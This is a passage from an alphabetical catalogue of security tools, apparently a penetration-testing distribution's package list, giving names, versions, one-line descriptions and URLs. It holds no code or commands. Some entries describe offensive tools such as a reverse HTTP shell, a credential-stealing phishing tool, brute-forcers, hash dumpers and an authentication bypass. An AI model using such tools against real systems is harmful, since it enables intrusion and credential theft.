2.0.0.20091101__ Generic library for injecting 802.11 frames http://802.11ninja.net/ * __lotophagi 0.1__ a relatively compact Perl script designed to scan remote hosts for default (or common) Lotus NSF and BOX databases. http://packetstormsecurity.com/files/55250/lotophagi.rar.html * __lsrtunnel 0.2__ lsrtunnel spoofs connections using source routed packets. http://www.synacklabs.net/projects/lsrtunnel/ * __luksipc 0.01__ A tool to convert unencrypted block devices to encrypted LUKS devices in-place. http://www.johannes-bauer.com/linux/luksipc * __lynis 1.6.4__ An auditing tool for Unix (specialists). http://www.rootkit.nl/projects/lynis.html * __mac-robber 1.02__ A digital investigation tool that collects data from allocated files in a mounted file system. http://www.sleuthkit.org/mac-robber/download.php * __macchanger 1.6.0__ A small utility to change your NIC's MAC address http://ftp.gnu.org/gnu/macchanger * __maclookup 0.3__ Lookup MAC addresses in the IEEE MA-L/OUI public listing. https://github.com/paraxor/maclookup * __magicrescue 1.1.9__ Find and recover deleted files on block devices http://freshmeat.net/projects/magicrescue/ * __magictree 1.3__ A penetration tester productivity tool designed to allow easy and straightforward data consolidation, querying, external command execution and report generation http://www.gremwell.com * __make-pdf 0.1.5__ This tool will embed javascript inside a PDF document. http://blog.didierstevens.com/programs/pdf-tools/ * __makepasswd 1.10_9__ Generates true random passwords with the emphasis on security over pronounceability (Debian version) http://packages.qa.debian.org/m/makepasswd.html * __malheur 0.5.4__ A tool for the automatic analyze of malware behavior. http://www.mlsec.org/malheur/ * __maligno 1.2__ An open source penetration testing tool written in python, that serves Metasploit payloads. It generates shellcode with msfvenom and transmits it over HTTP or HTTPS. http://www.encripto.no/tools/ * __malmon 0.3__ Hosting exploit/backdoor detection daemon. It's written in python, and uses inotify (pyinotify) to monitor file system activity. It checks files smaller then some size, compares their md5sum and hex signatures against DBs with known exploits/backdoor. http://sourceforge.net/projects/malmon/ * __maltego 3.5.3__ An open source intelligence and forensics application, enabling to easily gather information about DNS, domains, IP addresses, websites, persons, etc. http://www.paterva.com/web5 * __maltrieve 148.4ad4045__ Originated as a fork of mwcrawler. It retrieves malware directly from the sources as listed at a number of sites. https://github.com/technoskald/maltrieve * __malware-check-tool 1.2__ Python script that detects malicious files via checking md5 hashes from an offline set or via the virustotal site. It has http proxy support and an update feature. http://packetstormsecurity.com/files/93518/Malware-Check-Tool.2.html * __malwareanalyser 3.3__ A freeware tool to perform static and dynamic analysis on malware. http://malwareanalyser.blogspot.de/2011/10/malware-analyser.html * __malwaredetect 0.1__ Submits a file's SHA1 sum to VirusTotal to determine whether it is a known piece of malware http://www.virustotal.com * __malwasm 0.2__ Offline debugger for malware's reverse engineering. https://code.google.com/p/malwasm/ marc4dasm 6.f11860f This python-based tool is a disassembler for the Atmel MARC4 (a 4 bit Harvard micro). https://github.com/ApertureLabsLtd/marc4dasm * __maskprocessor 0.71__ A High-Performance word generator with a per-position configurable charset. http://hashcat.net/wiki/doku.php?id=maskprocessor * __masscan 391.a60cc70__ TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes. https://github.com/robertdavidgraham/masscan * __mat 0.5__ Metadata Anonymisation Toolkit composed of a GUI application, a CLI application and a library. https://mat.boum.org/ * __matahari 0.1.30__ A reverse HTTP shell to execute commands on remote machines behind firewalls. http://matahari.sourceforge.net * __mausezahn 0.40__ A free fast traffic generator written in C which allows you to send nearly every possible and impossible packet. http://www.perihel.at/sec/mz/ * __mbenum 1.5.0__ Queries the master browser for whatever information it has registered. http://www.cqure.net/wp/mbenum/ * __mboxgrep 0.7.9__ Mboxgrep is a small, non-interactive utility that scans mail folders for messages matching regular expressions. It does matching against basic and extended POSIX regular expressions, and reads and writes a variety of mailbox formats. http://mboxgrep.sourceforge.net * __md5deep 4.3__ Advanced checksum hashing tool http://md5deep.sourceforge.net * __mdbtools 0.7.1__ Utilities for viewing data and exporting schema from Microsoft Access Database files http://sourceforge.net/projects/mdbtools/ * __mdcrack 1.2__ MD4/MD5/NTLM1 hash cracker http://c3rb3r.openwall.net/mdcrack/ * __mdk3 6__ WLAN penetration tool http://homepages.tu-darmstadt.de/~p_larbig/wlan/ * __mdns-scan 0.5__ Scan mDNS/DNS-SD published services on the local network. * __medusa 2.1.1__ A speedy, massively parallel, modular, login brute-forcer for network. http://www.foofus.net/jmk/medusa/medusa.html * __melkor 1.0__ An ELF fuzzer that mutates the existing data in an ELF sample given to create orcs (malformed ELFs), however, it does not change values randomly (dumb fuzzing), instead, it fuzzes certain metadata with semi-valid values through the use of fuzzing rules (knowledge base). http://packetstormsecurity.com/files/127924/Melkor-ELF-Fuzzer.0.html * __memdump 1.01__ Dumps system memory to stdout, skipping over holes in memory maps. http://www.porcupine.org/forensics/tct.html * __memfetch 0.05b__ dumps any userspace process memory without affecting its execution http://lcamtuf.coredump.cx/ * __metacoretex 0.8.0__ MetaCoretex is an entirely JAVA vulnerability scanning framework for databases. http://metacoretex.sourceforge.net/ * __metagoofil 1.4b__ An information gathering tool designed for extracting metadata of public documents http://www.edge-security.com/metagoofil.php * __metasploit 29270.738fc78__ An open source platform that supports vulnerability research, exploit development and the creation of custom security tools representing the largest collection of quality-assured exploits. http://www.metasploit.com * __metoscan 05__ Tool for scanning the HTTP methods supported by a webserver. It works by testing a URL and checking the responses for the different requests. http://www.open-labs.org/ * __mfcuk 0.3.8__ MIFARE Classic Universal toolKit http://code.google.com/p/mfcuk/ * __mfoc 0.10.7__ Mifare Classic Offline Cracker http://code.google.com/p/mfoc/ * __mfsniffer 0.1__ A python script for capturing unencrypted TSO login credentials. http://packetstormsecurity.com/files/120802/MF-Sniffer-TN3270-Password-Grabber.html * __mibble 2.9.3__ Mibble is an open-source SNMP MIB parser (or SMI parser) written in Java. It can be used to read SNMP MIB files as well as simple ASN.1 files. http://www.mibble.org/ * __middler 1.0__ A Man in the Middle tool to demonstrate protocol middling attacks. http://code.google.com/p/middler/ * __minimysqlator 0.5__ A multi-platform application used to audit web sites in order to discover and exploit SQL injection vulnerabilities. http://www.scrt.ch/en/attack/downloads/mini-mysqlat0r * __miranda-upnp 1.3__ A Python-based Universal Plug-N-Play client application designed to discover, query and interact with UPNP devices http://code.google.com/p/miranda-upnp/ * __miredo 1.2.6__ Teredo client and server. http://www.remlab.net/miredo/ * __missidentify 1.0__ A program to find Win32 applications http://missidentify.sourceforge.net/ * __missionplanner 1.2.55__ A GroundControl Station for Ardupilot. https://code.google.com/p/ardupilot-mega/wiki/Mission * __mitmap 0.1__ Shell Script for launching a Fake AP with karma functionality and launches ettercap for packet capture and traffic manipulation. http://www.darkoperator.com/tools-and-scripts/ * __mitmer 22.b01c7fe__ A man-in-the-middle and phishing attack tool that steals the victim's credentials of some web services like Facebook. https://github.com/husam212/MITMer * __mitmf 169.83b4a93__ A Framework for Man-In-The-Middle attacks written in Python. https://github.com/byt3bl33d3r/MITMf * __mitmproxy 0.10.1__ SSL-capable man-in-the-middle HTTP proxy http://mitmproxy.org/ * __mkbrutus 1.0.2__ Password bruteforcer for MikroTik devices or boxes running RouterOS. http://mkbrutusproject.github.io/MKBRUTUS/ * __mobiusft 0.5.21__ An open-source forensic framework written in Python/GTK that manages cases and case items, providing an abstract interface for developing extensions. http://savannah.nongnu.org/projects/mobiusft * __modscan 0.1__ A new tool designed to map a SCADA MODBUS TCP based network. https://code.google.com/p/modscan/ * __moloch 0.9.2__ An open source large scale IPv4 full PCAP capturing, indexing and database system. https://github.com/aol/moloch * __monocle 1.0__ A local network host discovery tool. In passive mode, it will listen for ARP request and reply packets. In active mode, it will send ARP requests to the specific IP range. The results are a list of IP and MAC addresses present on the local network. http://packetstormsecurity.com/files/99823/Monocle-Host-Discovery-Tool.0.html * __morxbrute 1.01__ A customizable HTTP dictionary-based password cracking tool written in Perl http://www.morxploit.com/morxbrute/ * __morxcrack 1.2__ A cracking tool written in Perl to perform a dictionary-based attack on various hashing algorithm and CMS salted-passwords. http://www.morxploit.com/morxcrack/ * __mp3nema 0.4__ A tool aimed at analyzing and capturing data that is hidden between frames in an MP3 file or stream, otherwise noted as "out of band" data. http://packetstormsecurity.com/files/76432/MP3nema-Forensic-Analysis-Tool.html * __mptcp 1.9.0__ A tool for manipulation of raw packets that allows a large number of options. http://packetstormsecurity.com/files/119132/Mptcp-Packet-Manipulator.9.0.html * __mptcp-abuse 6.b0eeb27__ A collection of tools and resources to explore MPTCP on your network. Initially released at Black Hat USA 2014. https://github.com/Neohapsis/mptcp-abuse * __ms-sys 2.4.0__ A tool to write Win9x-.. master boot records (mbr) under linux - RTM! http://ms-sys.sourceforge.net/ * __mssqlscan 0.8.4__ A small multi-threaded tool that scans for Microsoft SQL Servers. http://www.cqure.net/wp/mssqlscan/ * __msvpwn 0.1.r23.g328921b__ Bypass Windows' authentication via binary patching. https://bitbucket.org/mrabault/msvpwn * __mtr 0.85__ Combines the functionality of traceroute and ping into one tool (CLI version) http://www.bitwizard.nl/mtr/ * __multiinjector 0.3__ Automatic SQL injection utility using a lsit of URI addresses to test parameter manipulation. http://chaptersinwebsecurity.blogspot.de/2008/11/multiinjector-v03-released.html * __multimac 1.0.3__ Multiple MACs on an adapter http://sourceforge.net/projects/multimac/ * __multitun 43.9804513__ Tunnel arbitrary traffic through an innocuous WebSocket. https://github.com/covertcodes/multitun * __mutator 51.164132d__ This project aims to be a wordlist mutator with hormones, which means that some mutations will be applied to the result of the ones that have been already done, resulting in something like: corporation -> C0rp0r4t10n_2012 https://bitbucket.org/alone/mutator/ * __mysql2sqlite 1.dd87f4__ Converts a mysqldump file into a Sqlite 3 compatible file https://gist.github.com/esperlu/943776 * __nacker 23.b67bb39__ A tool to circumvent 802.1x Network Access Control on a wired LAN. https://github.com/carmaa/nacker * __nbnspoof 1.0__ NBNSpoof - NetBIOS Name Service Spoofer http://www.mcgrewsecurity.com/tools/nbnspoof/ * __nbtenum 3.3__ A utility for Windows that can be used to enumerate NetBIOS information from one host or a range of hosts. http://reedarvin.thearvins.com/ * __nbtool 2.bf90c76__ Some tools for NetBIOS and DNS investigation, attacks, and communication. http://wiki.skullsecurity.org/Nbtool * __nbtscan 1.5.1__ NBTscan is a program for scanning IP networks for NetBIOS name information. http://www.inetcat.net/software/nbtscan.html * __ncpfs 2.2.6__ Allows you to mount volumes of NetWare servers under Linux. http://www.novell.com/ * __ncrack 0.4a__ A high-speed network authentication cracking tool http://nmap.org/ncrack/ * __nemesis 1.4__ command-line network packet crafting and injection utility http://nemesis.sourceforge.net/ * __netactview 0.6.2__ A graphical network connections viewer for Linux similar in functionality with Netstat http://netactview.sourceforge.net/index.html * __netbios-share-scanner 1.0__ This tool could be used to check windows workstations and servers if they have accessible shared resources. http://www.secpoint.com/netbios-share-scanner.html * __netcommander 1.3__ An easy-to-use arp spoofing tool. https://github.com/evilsocket/netcommander * __netcon 0.1__ A network connection establishment and management script. http://www.paramecium.org/~leendert/ * __netdiscover 0.3__ An active/passive address reconnaissance tool, mainly developed for those wireless networks without dhcp server, when you are wardriving. It can be also used on hub/switched networks. http://nixgeneration.com/~jaime/netdiscover/ * __netmap 0.1.3__ Can be used to make a graphical representation of the surounding network. http://netmap.sourceforge.net * __netmask 2.3.12__ Helps determine network masks http://packages.qa.debian.org/n/netmask.html * __netreconn 1.76__ A collection of network scan/recon tools that are relatively small compared to their larger cousins. http://packetstormsecurity.com/files/86076/NetReconn-Scanning-Tool-Collection.76.html * __netscan 1.0__ Tcp/Udp/Tor port scanner with: synpacket, connect TCP/UDP and socks5 (tor connection). http://packetstormsecurity.com/files/125569/Netscan-Port-Scanner.0.html * __netsed 1.2__ Small and handful utility design to alter the contents of packets forwarded thru network in real time. http://silicone.homelinux.org/projects/netsed/ * __netsniff-ng 0.5.8__ A high performance Linux network sniffer for packet inspection. http://netsniff-ng.org/ * __netzob 0.4.1__ An open source tool for reverse engineering, traffic generation and fuzzing of communication protocols. http://www.netzob.org/ * __nfcutils 0.3.2__ Provides a simple 'lsnfc' command that list tags which are in your NFC device field http://code.google.com/p/nfc-tools * __nfex 2.5__ A tool for extracting files from the network in real-time or post-capture from an offline tcpdump pcap savefile. It is based off of the code-base from the apparently defunct project tcpxtract. https://code.google.com/p/nfex/ * __nfspy 1.0__ A Python library for automating the falsification of NFS credentials when mounting an NFS share. https://github.com/bonsaiviking/NfSpy * __nfsshell 19980519__ Userland NFS command tool. http://www.paramecium.org/~leendert/ * __ngrep 1.45__ A grep-like utility that allows you to search for network packets on an interface. http://ngrep.sourceforge.net/ * __nield 0.5.1__ A tool to receive notifications from kernel through netlink socket, and generate logs related to interfaces, neighbor cache(ARP,NDP), IP address(IPv4,IPv6), routing, FIB rules, traffic control. http://nield.sourceforge.net/ * __nikto 2.1.5__ A web server scanner which performs comprehensive tests against web servers for multiple items http://www.cirt.net/nikto2 * __nimbostratus 54.c7c206f__ Tools for fingerprintinging and exploiting Amazon cloud infrastructures. https://github.com/andresriancho/nimbostratus * __nipper 0.11.7__ Network Infrastructure Parser https://www.titania-security.com/ * __nishang 0.4.0__ Using PowerShell for Penetration Testing. https://code.google.com/p/nishang/ * __nkiller2 2.0__ A TCP exhaustion/stressing tool. http://sock-raw.org/projects.html * __nmap 6.47__ Utility for network discovery and security auditing http://nmap.org/ * __nmbscan 1.2.6__ Tool to scan the shares of a SMB/NetBIOS network, using the NMB/SMB/NetBIOS protocols. http://nmbscan.gbarbier.org/ * __nomorexor 0.1__ Tool to help guess a files 256 byte XOR key by using frequency analysis https://github.com/hiddenillusion/NoMoreXOR * __notspikefile 0.1__ A Linux based file format fuzzing tool http://packetstormsecurity.com/files/39627/notSPIKEfile.tgz.html * __nsdtool 0.1__ A netgear switch discovery tool. It contains some extra features like bruteoforce and setting a new password. http://www.curesec.com/en/publications/tools.html * __nsec3walker 20101223__ Enumerates domain names using DNSSEC http://dnscurve.org/nsec3walker.html * __ntds-decode 0.1__ This application dumps LM and NTLM hashes from active accounts stored in an Active Directory database. http://packetstormsecurity.com/files/121543/NTDS-Hash-Decoder.b.html * __o-saft 513.6bcc35b__ A tool to show informations about SSL certificate and tests the SSL connection according given list of ciphers and various SSL configurations. https://www.owasp.org/index.php/O-Saft * __oat 1.3.1__ A toolkit that could be used to audit security within Oracle database servers. http://www.cqure.net/wp/test/ * __obexstress 0.1__ Script for testing remote OBEX service for some potential vulnerabilities. http://bluetooth-pentest.narod.ru/ * __obfsproxy 0.2.12__ A pluggable transport proxy written in Python. https://pypi.python.org/pypi/obfsproxy * __oclhashcat 1.30__ Worlds fastest WPA cracker with dictionary mutation engine. http://hashcat.net/oclhashcat/ * __ocs 0.2__ Compact mass scanner for Cisco routers with default telnet/enable passwords. http://packetstormsecurity.com/files/119462/OCS-Cisco-Scanner.2.html * __ohrwurm 0.1__ A small and simple RTP fuzzer. http://mazzoo.de/ * __ollydbg 201g__ A 32-bit assembler-level analysing debugger http://www.ollydbg.de * __onesixtyone 0.7__ An SNMP scanner that sends multiple SNMP requests to multiple IP addresses http://labs.portcullis.co.uk/application/onesixtyone/ * __onionshare 439.027d774__ Securely and anonymously share a file of any size. https://github.com/micahflee/onionshare/ * __openstego 0.6.1__ A tool implemented in Java for generic steganography, with support for password-based encryption of the data. http://www.openstego.info/ * __opensvp 64.56b2b8f__ A security tool implementing "attacks" to be able to the resistance of firewall to protocol level attack. https://github.com/regit/opensvp * __openvas-cli 1.3.1__ The OpenVAS Command-Line Interface http://www.openvas.org/ * __openvas-libraries 7.0.6__ The OpenVAS libraries http://www.openvas.org/ * __openvas-manager 5.0.7__ A layer between the OpenVAS Scanner and various client applications http://www.openvas.org/ * __openvas-scanner 4.0.5__ The OpenVAS scanning Daemon http://www.openvas.org/ * __ophcrack 3.6.0__ A free Windows password cracker based on rainbow tables http://ophcrack.sourceforge.net * __orakelcrackert 1.00__ This tool can crack passwords which are encrypted using Oracle's latest SHA1 based password protection algorithm. http://freeworld.thc.org/thc-orakelcrackert11g/ * __origami 1.2.7__ Aims at providing a scripting tool to generate and analyze malicious PDF files. http://code.google.com/p/origami-pdf * __oscanner 1.0.6__ An Oracle assessment framework developed in Java. http://www.cqure.net/wp/oscanner/ * __ostinato 0.5.1__ An open-source, cross-platform packet/traffic generator and analyzer with a friendly GUI. It aims to be "Wireshark in Reverse" and thus become complementary to Wireshark. http://code.google.com/p/ostinato/ * __osueta 65.90323e2__ A simple Python script to exploit the OpenSSH User Enumeration Timing Attack. https://github.com/c0r3dump3d/osueta * __owabf 1.3__ Outlook Web Access bruteforcer tool. http://netsec.rs/70/tools.html * __owasp-bywaf 26.e730d1b__ A web application penetration testing framework (WAPTF). https://github.com/depasonico/OWASP-ByWaf * __owtf 1016.fef357e__ The Offensive (Web) Testing Framework. https://www.owasp.org/index.php/OWASP_OWTF * __p0f 3.08b__ Purely passive TCP/IP traffic fingerprinting tool. http://lcamtuf.coredump.cx/p0f3/ * __pack 0.0.4__ Password Analysis and Cracking Kit http://thesprawl.org/projects/pack/ * __packerid 1.4__ Script which uses a PEiD database to identify which packer (if any) is being used by a binary. http://handlers.sans.org/jclausing/ * __packet-o-matic 351__ A real time packet processor. Reads the packet from an input module, match the packet using rules and connection tracking information and then send it to a target module. http://www.packet-o-matic.org/ * __packeth 1.7.2__ A Linux GUI packet generator tool for ethernet. http://packeth.sourceforge.net/ * __packit 1.0__ A network auditing tool. Its value is derived from its ability to customize, inject, monitor, and manipulate IP traffic. http://packit.sourceforge.net/ * __pacumen 1.92a0884__ Packet Acumen - Analyse encrypted network traffic and more (side-channel attacks). https://github.com/bniemczyk/pacumen * __padbuster 0.3.3__ Automated script for performing Padding Oracle attacks. http://www.gdssecurity.com/l/t.php * __paketto 1.10__ Advanced TCP/IP Toolkit. http://www.doxpara.com/paketto * __panoptic 178.73b2b4c__ A tool that automates the process of search and retrieval of content for common log and config files through LFI vulnerability. https://github.com/lightos/Panoptic * __paros 3.2.13__ Java-based HTTP/HTTPS proxy for assessing web app vulnerabilities. Supports editing/viewing HTTP messages on-the-fly, spiders, client certificates, proxy-chaining, intelligent scanning for XSS and SQLi, etc. http://www.parosproxy.org * __parsero 56.fc5f7ec__ A robots.txt audit tool. https://github.com/behindthefirewalls/Parsero * __pasco 20040505_1__ Examines the contents of Internet Explorer's cache files for forensic purposes http://www.jonesdykstra.com/ * __passcracking 20131214__ A little python script for sending hashes to passcracking.com and milw0rm http://github.com/jensp/passcracking * __passe-partout 0.1__ Tool to extract RSA and DSA private keys from any process linked with OpenSSL. The target memory is scanned to lookup specific OpenSSL patterns. http://www.hsc.fr/ressources/outils/passe-partout/index.html.en * __passivedns 1.1.3__ A network sniffer that logs all DNS server replies for use in a passive DNS setup. https://github.com/gamelinux/passivedns * __pastenum 0.4.1__ Search Pastebins for content, fork from nullthreat corelan pastenum2 http://github.com/shadowbq/pastenum * __patator 80.5a140c1__ A multi-purpose bruteforcer. https://github.com/lanjelot/patator * __pathod 0.11.1__ Crafted malice for tormenting HTTP clients and servers. http://pathod.net/ * __pblind 1.0__ Little utility to help exploiting blind sql injection vulnerabilities. http://www.edge-security.com/pblind.php * __pcapsipdump 0.2__ A tool for dumping SIP sessions (+RTP traffic, if available) to disk in a fashion similar to 'tcpdump -w' (format is exactly the same), but one file per sip session (even if there is thousands of concurrect SIP sessions). http://pcapsipdump.sourceforge.net/ * __pcredz 0.9__ A tool that extracts credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, and more from a pcap file or from a live interface. https://github.com/lgandx/PCredz * __pdf-parser 0.4.2__ Parses a PDF document to identify the fundamental elements used in the analyzed file http://blog.didierstevens.com/programs/pdf-tools/ * __pdfbook-analyzer 2__ Utility for facebook memory forensics. http://sourceforge.net/projects/pdfbook/ * __pdfcrack 0.12__ Password recovery tool for PDF-files. http://pdfcrack.sourceforge.net/ * __pdfid 0.1.2__ scan a file to look for certain PDF keywords http://blog.didierstevens.com/programs/pdf-tools/ * __pdfresurrect 0.12__ A tool aimed at analyzing PDF documents. http://packetstormsecurity.com/files/118459/PDFResurrect-PDF-Analyzer.12.html * __pdgmail 1.0__ A password dictionary attack tool that targets windows authentication via the SMB protocol http://www.jeffbryner.com/code/pdgmail * __peach 3.0.202__ A SmartFuzzer that is capable of performing both generation and mutation based fuzzing http://peachfuzzer.com/ * __peda 51.327db44__ Python Exploit Development Assistance for GDB. https://github.com/longld/peda * __peepdf 0.3__ A Python tool to explore PDF files in order to find out if the file can be harmful or not http://eternal-todo.com/tools/peepdf-pdf-analysis-tool * __pentbox 1.8__ A security suite that packs security and stability testing oriented tools for networks and systems. http://www.pentbox.net * __perl-image-exiftool 9.76__ Reader and rewriter of EXIF informations that supports raw files http://search.cpan.org/perldoc?exiftool * __perl-tftp 1.0b3__ TFTP - TFTP Client class for perl http://search.cpan.org/~gsm/TFTP/TFTP.pm * __pev 0.60__ Command line based tool for PE32/PE32+ file analysis http://pev.sourceforge.net/ * __pextractor 0.18b__ A forensics tool that can extract all files from an executable file created by a joiner or similar. http://packetstormsecurity.com/files/62977/PExtractor_v0.18b_binary_and_src.rar.html * __pgdbf 94.baa1d95__ Convert XBase / FoxPro databases to PostgreSQL https://github.com/kstrauser/pgdbf * __phoss 0.1.13__ Sniffer designed to find HTTP, FTP, LDAP, Telnet, IMAP4, VNC and POP3 logins. http://www.phenoelit.org/fr/tools.html * __php-mt-seed 3.2__ PHP mt_rand() seed cracker http://www.openwall.com/php_mt_seed/ * __php-rfi-payload-decoder 30.bd42caa__ Decode and analyze RFI payloads developed in PHP. https://github.com/bwall/PHP-RFI-Payload-Decoder * __php-vulnerability-hunter 1.4.0.20__ An whitebox fuzz testing tool capable of detected several classes of vulnerabilities in PHP web applications. https://phpvulnhunter.codeplex.com/ * __phpstress 5.f987a7e__ A PHP denial of service / stress test for Web Servers running PHP-FPM or PHP-CGI. https://github.com/nightlionsecurity/phpstress * __phrasendrescher 1.2.2__ A modular and multi processing pass phrase cracking tool http://www.leidecker.info/projects/phrasendrescher/ * __pipal 1.1__ A password analyser http://www.digininja.org/projects/pipal.php * __pirana 0.3.1__ Exploitation framework that tests the security of a email content filter. http://www.guay-leroux.com/projects.html * __plcscan 0.1__ This is a tool written in Python that will scan for PLC devices over s7comm or modbus protocols. http://packetstormsecurity.com/files/119726/PLC-Device-Scanner.html * __plecost 2__ Wordpress finger printer tool search and retrieve information about the plugins versions installed in Wordpress systems. http://code.google.com/p/plecost/ * __plown 13.ccf998c__ A security scanner for Plone CMS. https://github.com/unweb/plown * __pmcma 1.00__ Automated exploitation of invalid memory writes (being them the consequences of an overflow in a writable section, of a missing format string, integer overflow, variable misuse, or any other type of memory corruption). http://packetstormsecurity.com/files/104724/Post-Memory-Corruption-Memory-Analyzer.00.html * __pnscan 1.11__ A parallel network scanner that can be used to survey TCP network services. http://www.lysator.liu.se/~pen/pnscan/ * __pompem 69.b2569c4__ A python exploit tool finder. https://github.com/rfunix/Pompem * __portspoof 100.70b6bf2__ This program's primary goal is to enhance OS security through a set of new techniques. http://portspoof.org/ * __posttester 0.1__ A jar file that will send POST requests to servers in order to test for the hash collision vulnerability discussed at the Chaos Communication Congress in Berlin. http://packetstormsecurity.com/files/109010/MagicHash-Collision-Testing-Tool.html * __powerfuzzer 1_beta__ Powerfuzzer is a highly automated web fuzzer based on many other Open Source fuzzers available (incl. cfuzzer, fuzzled, fuzzer.pl, jbrofuzz, webscarab, wapiti, Socket Fuzzer). It can detect XSS, Injections (SQL, LDAP, commands, code, XPATH) and others. http://www.powerfuzzer.com * __powersploit 239.dc1a5e5__ A PowerShell Post-Exploitation Framework. https://github.com/mattifestation/PowerSploit * __praeda 37.093d1c0__ An automated data/information harvesting tool designed to gather critical information from various embedded devices. https://github.com/percx/Praeda * __prometheus 175.497b2ce__ A Firewall analyzer written in ruby https://github.com/averagesecurityguy/prometheus * __propecia 2__ A fast class scanner that scans for a specified open port with banner grabbing http://www.redlevel.org * __protos-sip 2__ SIP test suite. https://www.ee.oulu.fi/research/ouspg/PROTOS_Test-Suite_c07-sip * __proxychains-ng 4.8.1__ A hook preloader that allows to redirect TCP traffic of existing dynamically linked programs through one or more SOCKS or HTTP proxies https://github.com/rofl0r/proxychains * __proxycheck 0.1__ This is a simple proxy tool that checks for the HTTP CONNECT method and grabs verbose output from a webserver. http://packetstormsecurity.com/files/61864/proxycheck.pl.txt.html * __proxyp 2013__ Small multithreaded Perl script written to enumerate latency, port numbers, server names, & geolocations of proxy IP addresses. http://sourceforge.net/projects/proxyp/ * __proxyscan 0.3__ A security penetration testing tool to scan for hosts and ports through a Web proxy server. http://packetstormsecurity.com/files/69778/proxyScan.3.tgz.html * __proxytunnel 1.9.0__ a program that connects stdin and stdout to a server somewhere on the network, through a standard HTTPS proxy http://proxytunnel.sourceforge.net * __pscan 1.3__ A limited problem scanner for C source files http://deployingradius.com/pscan/ * __pshitt 21.85cde65__ A lightweight fake SSH server designed to collect authentication data sent by intruders. https://github.com/regit/pshitt * __pstoreview 1.0__ Lists the contents of the Protected Storage. http://www.ntsecurity.nu/toolbox/pstoreview/ * __ptunnel 0.72__ A tool for reliably tunneling TCP connections over ICMP echo request and reply packets http://www.cs.uit.no/~daniels/PingTunnel/#download * __pwd-hash 2.0__ A password hashing tool that use the crypt function to generate the hash of a string given on standard input. http://vladz.devzero.fr/pwd-hash.php * __pwdump 7.1__ Extracts the binary SAM and SYSTEM file from the filesystem and then the hashes. http://www.tarasco.org/security/pwdump_7/index.html * __pwnat 0.3__ A tool that allows any number of clients behind NATs to communicate with a server behind a separate NAT with *no* port forwarding and *no* DMZ setup on any routers in order to directly communicate with each other http://samy.pl/pwnat/ * __pwntools 2.1.3__ The CTF framework used by #Gallopsled in every CTF. https://github.com/Gallopsled/pwntools * __pyew 2.3.0__ A python tool to analyse malware. https://code.google.com/p/pyew/ * __pyfiscan 1015.072ce1e__ Free web-application vulnerability and version scanner. https://github.com/fgeek/pyfiscan * __pyinstaller 2.1__ A program that converts (packages) Python programs into stand-alone executables, under Windows, Linux, Mac OS X, Solaris and AIX. http://www.pyinstaller.org/ * __pyminifakedns 0.1__ Minimal DNS server written in Python; it always replies with a 127.0.0.1 A-record http://code.activestate.com/recipes/491264/ * __pyrasite 2.0__ Code injection and introspection of running Python processes. http://pyrasite.com/ * __pyrit 0.4.0__ WPA/WPA2-PSK attacking with gpu and cluster http://code.google.com/p/pyrit * __pytacle alpha2__ Automates the task of sniffing GSM frames http://packetstormsecurity.com/files/124299/pytacle-alpha2.tar.gz * __pytbull 2.0__ A python based flexible IDS/IPS testing framework shipped with more than 300 tests http://pytbull.sourceforge.net/ * __python-utidylib 0.2__ Python bindings for Tidy HTML parser/cleaner. http://utidylib.berlios.de * __python2-binaryornot 0.3.0__ Ultra-lightweight pure Python package to check if a file is binary or text. https://github.com/audreyr/binaryornot * __python2-yara 3.2.0__ A malware identification and classification tool. https://github.com/plusvic/yara * __quickrecon 0.3.2__ A python script for simple information gathering. It attempts to find subdomain names, perform zone transfers and gathers emails from Google and Bing. http://packetstormsecurity.com/files/104314/QuickRecon.3.2.html radamsa 0.3 General purpose data fuzzer. https://code.google.com/p/ouspg/wiki/Radamsa radare2 0.9.8 Open-source tools to disasm, debug, analyze and manipulate binary files. http://radare.org/ radiography 2 A forensic tool which grabs as much information as possible from a Windows system. http://www.security-projects.com/?RadioGraPhy rainbowcrack 1.2 Password cracker based on the faster time-memory trade-off. With MySQL and Cisco PIX Algorithm patches. http://project-rainbowcrack.com/ rarcrack 0.2 This program uses bruteforce algorithm to find correct password (rar, 7z, zip). http://rarcrack.sourceforge.net/ ratproxy 1.58 A passive web application security assessment tool http://code.google.com/p/ratproxy/ rawr 42.ff1bfa1 Rapid Assessment of Web Resources. A web enumerator. https://bitbucket.org/al14s/rawr/wiki/Home rcracki-mt 0.7.0 A tool to perform rainbow table attacks on password hashes. It is intended for indexed/perfected rainbow tables, mainly generated by the distributed project www.freerainbowtables.com http://rcracki.sourceforge.net/ rdesktop-brute 1.5.0 It connects to windows terminal servers - Bruteforce patch included. http://www.rdesktop.org/ reaver 1.4 Implements a brute force attack against wifi protected setup WPS registrar PINs in order to recover WPA/WPA2 passphrases http://code.google.com/p/reaver-wps rebind 0.3.4 DNS Rebinding Tool http://code.google.com/p/rebind/ recon-ng 885.f42ffbe A full-featured Web Reconnaissance framework written in Python. https://bitbucket.org/LaNMaSteR53/recon-ng recoverjpeg 2.2.2 Recover jpegs from damaged devices. http://www.rfc1149.net/devel/recoverjpeg recstudio 4.0_20130717 Cross platform interactive decompiler http://www.backerstreet.com/rec/rec.htm redfang 2.5 Finds non-discoverable Bluetooth devices by brute-forcing the last six bytes of the devices' Bluetooth addresses and calling read_remote_name(). http://packetstormsecurity.com/files/31864/redfang.2.5.tar.gz.html redirectpoison 1.1 A tool to poison a targeted issuer of SIP INVITE requests with 301 (i.e. Moved Permanently) redirection responses. http://www.hackingexposedvoip.com/ regeorg 26.22fb8a9 The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn. https://github.com/sensepost/reGeorg reglookup 1.0.1 Command line utility for reading and querying Windows NT registries http://projects.sentinelchicken.org/reglookup relay-scanner 1.7 An SMTP relay scanner. http://www.cirt.dk replayproxy 1.1 Forensic tool to replay web-based attacks (and also general HTTP traffic) that were captured in a pcap file. https://code.google.com/p/replayproxy/ responder 117.6c7a5dd A LLMNR and NBT-NS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. https://github.com/SpiderLabs/Responder/ rfcat 130515 RF ChipCon-based Attack Toolset http://code.google.com/p/rfcat rfdump 1.6 A back-end GPL tool to directly inter-operate with any RFID ISO-Reader to make the contents stored on RFID tags accessible 